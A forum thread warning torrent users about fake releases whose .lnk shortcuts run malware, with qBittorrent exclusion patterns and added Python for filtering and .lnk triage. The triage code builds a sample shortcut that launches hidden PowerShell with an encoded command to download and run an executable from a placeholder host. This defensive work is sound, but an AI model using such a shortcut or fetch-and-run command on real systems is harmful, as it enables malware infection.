There are some torrents showing up with a .lnk extension (ex: movie.mp3.lnk, tvshow.mkv.lnk…), and automated software (Sonarr, Radarr, Lidarr, qBittorrent RSS Downloader) could pick those torrents (but not import them).

These (fake) torrents include a .lnk file that executes a script on your Windows machine.


HOW TO exclude them from download in qBittorrent.

  • Go to Options -> Downloads

  • Enable “Exclude file names”

  • Add patterns:

(one per line)

*.mp4.lnk
*.mp3.lnk
*.mkv.lnk
*.torrent.lnk
*.zipx
*.scr
*.arj
*.lzh

Or exclude all of them at once: *.lnk


Example on VirusTotal https://www.virustotal.com/gui/file/e74f64df6ebaf3a1b6e3f42591eb6e87d2ac2828eb5a99fd8d3d82c140137fc9/detection
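The exclusion list above, applied to a constructed torrent file list so you can see which files the patterns catch and which they miss. This is an added example, not part of the original post and not qBittorrent's code; that qBittorrent applies the patterns as shell-style wildcards against the file name and ignores case is an assumption, so verify it against your own version with a harmless torrent.

```python
import fnmatch
import re

# The patterns from the post, one per line as typed into
# Options -> Downloads -> "Exclude file names".
EXCLUDE_PATTERNS = [
    "*.mp4.lnk", "*.mp3.lnk", "*.mkv.lnk", "*.torrent.lnk",
    "*.zipx", "*.scr", "*.arj", "*.lzh",
]
CATCH_ALL_LNK = ["*.lnk"]

# Constructed file list mimicking what a few torrents would carry;
# not taken from any real torrent.
SAMPLE_FILES = [
    "Some.Show.S02E08.1080p.WEB.H264-GRP/Some.Show.S02E08.1080p.WEB.H264-GRP.mkv.lnk",
    "Some.Show.S02E08.1080p.WEB.H264-GRP/Some.Show.S02E08.1080p.WEB.H264-GRP.MKV.LNK",
    "Some.Show.S02E08.1080p.WEB.H264-GRP/README.txt",
    "Real.Movie.2024.1080p.BluRay.x264-GRP/Real.Movie.2024.1080p.BluRay.x264-GRP.mkv",
    "Some.Album/01 - Track.mp3",
    "Some.Album/cover.jpg.lnk",
    "Tool/setup.scr",
]


def compile_patterns(patterns):
    """Turn shell-style globs into case-insensitive regexes.

    Assumption: qBittorrent matches these patterns as wildcards against
    the file name and ignores case. Confirm on a harmless test torrent
    with your own version before trusting the list."""
    return [re.compile(fnmatch.translate(p), re.IGNORECASE) for p in patterns]


def is_excluded(path, compiled):
    """Match the final path component only, so a directory name
    inside the torrent never triggers (or masks) a rule."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return any(rx.match(name) for rx in compiled)


def split_files(files, patterns=EXCLUDE_PATTERNS):
    """Return (kept, excluded) file lists for one torrent."""
    compiled = compile_patterns(patterns)
    kept, excluded = [], []
    for f in files:
        (excluded if is_excluded(f, compiled) else kept).append(f)
    return kept, excluded


def only_junk(files, patterns=EXCLUDE_PATTERNS):
    """True when nothing in the torrent would be downloaded at all,
    i.e. the whole release is a decoy and the grab is worthless."""
    kept, _ = split_files(files, patterns)
    return not kept


if __name__ == "__main__":
    kept, excluded = split_files(SAMPLE_FILES)
    print("excluded:", *excluded, sep="\n  ")
    print("kept:", *kept, sep="\n  ")
```

Run as is to print both lists. The post's specific patterns let a file such as `cover.jpg.lnk` through, while the catch-all `*.lnk` does not; `only_junk()` tells you when a release would download nothing at all, which is the case worth alerting on in an automation.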

    • ad_on_is@lemm.ee · 1 year ago

      Microsoft: De nada, amigo! Oh… here’s an ad, btw… and…did you enable Recall already?

      • ReversalHatchery@beehaw.org · 1 year ago

        Or rather: oh, silly you, you were so clumsy that you disabled Recall by accident again. Let us be so kind as to re-enable it for you.

    • wizardbeard@lemmy.dbzer0.com · 1 year ago

      Yes, but also whoever set the defaults for the *arr tools. Why would any filename with extra shit past the extensions you’re looking for be considered an acceptable result?

      Tack $ on the end of your regex, for fuck's sake.
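To illustrate the anchoring point in the comment above, an added example that is not code from the *arr projects: the patterns and file names are constructed for illustration and say nothing about what any tool's real default filter looks like.

```python
import re

# Constructed release file names, not taken from a real indexer.
CANDIDATES = [
    "Some.Show.S02E08.1080p.WEB.H264-GRP.mkv",
    "Some.Show.S02E08.1080p.WEB.H264-GRP.mkv.lnk",
    "Some.Show.S02E08.1080p.WEB.H264-GRP.MKV.LNK",
    "Some.Show.S02E08.1080p.WEB.H264-GRP.mkv.exe",
    "Some.Show.S02E08.1080p.WEB.H264-GRP.mp4",
    "Some.Show.S02E08.1080p.WEB.H264-GRP.mkv.torrent",
]

MEDIA_EXT = r"\.(?:mkv|mp4|avi|mp3|flac)"

# Loose: only asks whether a media extension appears *somewhere* in the
# name, so "x.mkv.lnk" passes.
LOOSE = re.compile(MEDIA_EXT, re.IGNORECASE)

# Anchored: the media extension must be the last thing in the name.
# Python's $ also matches just before a trailing newline; \Z does not,
# so a name ending in "mkv\n" is rejected as well.
STRICT = re.compile(MEDIA_EXT + r"\Z", re.IGNORECASE)

# Report-only pattern for the specific trick: a media extension followed
# by one more short extension (.lnk, .exe, .torrent, ...).
DOUBLE_EXT = re.compile(MEDIA_EXT + r"\.[a-z0-9]{1,7}\Z", re.IGNORECASE)


def accepted(names, pattern):
    """Names the given filter would let through."""
    return [n for n in names if pattern.search(n)]


def has_double_extension(name):
    return DOUBLE_EXT.search(name) is not None


if __name__ == "__main__":
    for name in CANDIDATES:
        print(f"{name:50} loose={bool(LOOSE.search(name))!s:5} "
              f"strict={bool(STRICT.search(name))!s:5} "
              f"double_ext={has_double_extension(name)}")
```

With the loose pattern every candidate is accepted; with the anchored one only the two genuine media files survive, and the double-extension check names the rest explicitly so they can be logged rather than silently dropped.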

  • N0x0n@lemmy.ml · 1 year ago

    For those interested, John Hammond did a video a few months ago about the .lnk extension (and 16 other hidden extensions on Windows).

    He doesn't go too much or too deep into the subject, but you get a general view of how this could be exploited.

    YouTube link

    Piped Link

    • American_Jesus@lemm.ee (OP) · 1 year ago

      Sonarr will still pick the release and download GBs of malware, and if you don't notice, your download directory is filled with GBs of fake torrents.

      • Petter1@lemm.ee · 8 months ago

        We just delete those that failed to import periodically with an automation 😁

      • LiveLM@lemmy.zip · 1 year ago

        Weak.
        Harbor disaster. Seed the malware. Spread the fruits of chaos amongst the unworthy. Be complicit in their downfall. Feed on their agony ^^/s

        • American_Jesus@lemm.ee (OP) · 1 year ago

          Not these ones; some could be more than 1 GB. Look at the VirusTotal link: the file was 422 MB.

          Also, Sonarr/Radarr filter torrents by size.

          Here are some examples:
          https://bt4gprx.com/search?q=The.Lord.of.The.Rings.The.Rings.of.Power.S02E08

          Those were posted on 1337x (and removed) and probably other sites. Sonarr can pick those based on release name and torrent size.

          PS: I had to rename the file from .lnk to .com so VirusTotal would accept it.

          • catloaf@lemm.ee · 1 year ago

            Anyone paying attention to size would probably also notice they’re just .lnk files.

            • Aatube@kbin.melroy.org · 1 year ago

              Not necessarily. Even with “hide extensions” unchecked, Windows hides the .lnk extension by default; it just shows an arrow in the bottom-right corner of the icon, which is plausibly missed when in the list view. I’m surprised antivirus doesn’t know about it already tbh.

  • Xianshi@lemm.ee · 1 year ago

    Nice one, OP. Just had Sonarr pick up one of these today, named like a proper release from a trusted group. Sonarr didn't move it from qBit, but better not to DL it in the first place, even though it's a Linux box.

  • Lojcs@lemm.ee · 1 year ago

    How is the link file executing malware? Can you put any shell script as the target?

    • teles@lemmy.eco.br · 1 year ago

      I am pretty sure a link file can open cmd/powershell with parameters to execute commands

      • montar@lemmy.ml · 1 year ago

        Yep! I found out while browsing a hacking/spamming site, where I found something too good to be true: it downloaded an archive nested inside another archive, and in it was a single .lnk file leading to "the resource". Peeking inside, I found PowerShell executing a base64 (or base32?) encoded script (it's got a command-line option for that; if you want to ask wtf, ask Microsoft, and tell me). It downloaded some exe from some site and ran it; the site was already down.
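What the two comments above describe (a .lnk whose target is cmd/powershell and whose arguments carry a base64-encoded script) can be checked offline by parsing the shortcut instead of opening it. The following is an added example, not from the thread or from any project: it reads the MS-SHLLINK header and StringData fields to pull out the target, working directory, arguments and ShowCommand, decodes a PowerShell -EncodedCommand (base64 of UTF-16LE text), and flags the usual indicators. The sample .lnk is constructed by the script itself (the command points at example.invalid, a reserved name that never resolves) and is not a real malware sample; decoding non-Unicode StringData as cp1252 is an assumption, since the real code page is that of the system that created the file.

```python
import base64
import re
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) and the Shell Link CLSID 00021401-0000-0000-C000-000000000046
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7          # ShowCommand value that starts the window minimised
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# Constructed sample payload; example.invalid is a reserved name that never resolves.
SAMPLE_COMMAND = ("Invoke-WebRequest http://example.invalid/p.exe -OutFile $env:TEMP\\p.exe; "
                  "Start-Process $env:TEMP\\p.exe")


def _read_string(data, pos, unicode):
    """One StringData item: uint16 character count, then the characters."""
    (count,) = struct.unpack_from("<H", data, pos)
    pos, width = pos + 2, (2 if unicode else 1)
    raw = data[pos:pos + count * width]
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", "replace")  # assumption
    return text, pos + count * width


def parse_lnk(data):
    """Return target path, working dir, arguments and ShowCommand of a .lnk."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    (flags,) = struct.unpack_from("<I", data, 20)
    (show_cmd,) = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_LINK_TARGET_IDLIST:              # skip the ItemID list
        (size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                       # skip LinkInfo (size includes itself)
        (size,) = struct.unpack_from("<I", data, pos)
        pos += size
    unicode = bool(flags & IS_UNICODE)
    info = {"show_command": show_cmd}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        info[key], pos = _read_string(data, pos, unicode) if flags & bit else (None, pos)
    return info


def decode_encoded_command(args):
    """Decode -e/-ec/-enc/-EncodedCommand <base64 of UTF-16LE>, or None if absent."""
    m = re.search(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", args or "")
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(data):
    """Parse a .lnk and list the indicators an analyst would flag."""
    info = parse_lnk(data)
    target = (info["relative_path"] or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    findings = []
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a script host: {target}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=7, window starts minimised (hides the console)")
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", info["arguments"] or ""):
        findings.append("PowerShell -WindowStyle hidden")
    decoded = decode_encoded_command(info["arguments"])
    if decoded is not None:
        findings.append("encoded command: " + decoded)
    return info, findings


def _string_data(text):
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_sample_lnk():
    """Constructed .lnk (no IDList, no LinkInfo) launching PowerShell with a hidden
    window and SAMPLE_COMMAND base64-encoded. Not real malware."""
    enc = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode()
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    hdr = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    hdr += b"\x00" * (60 - len(hdr))                # attributes, timestamps, size, icon index
    hdr += struct.pack("<I", SW_SHOWMINNOACTIVE)    # ShowCommand
    hdr += b"\x00" * (76 - len(hdr))                # hotkey, reserved
    return (hdr + _string_data(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
            + _string_data(r"C:\Users\Public") + _string_data("-nop -w hidden -enc " + enc))


if __name__ == "__main__":
    info, findings = triage(build_sample_lnk())
    print("target:", info["relative_path"])
    for f in findings:
        print("!", f)
```

Point `triage()` at `open(path, "rb").read()` for a shortcut pulled out of a suspicious download; the decoded command is what to submit or search for, since the base64 blob itself changes per sample.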

    • American_Jesus@lemm.ee (OP) · 1 year ago

      On many distros it will open with WINE by default. Not a big deal, you can just delete ~/.wine if it does anything.

      • kevincox@lemmy.ml · 8 months ago

        Wine will mount your root folder as a Windows drive by default. So if the malware is scanning all connected drives and encrypting/uploading them, you still have a problem.